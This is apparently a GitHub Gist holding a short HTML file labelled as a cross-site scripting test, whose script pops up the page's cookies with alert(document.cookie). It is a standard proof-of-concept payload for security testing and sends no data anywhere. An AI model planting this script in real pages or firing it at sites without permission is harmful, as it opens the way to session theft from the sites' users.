Created
February 8, 2021 08:12
-
-
Save Kolobok12309/301788bef621a5cac76d576e8171c52f to your computer and use it in GitHub Desktop.
Html file for test xss
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head></head> | |
<body> | |
<h4> | |
Xss file | |
</h4> | |
<script> | |
alert(document.cookie); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment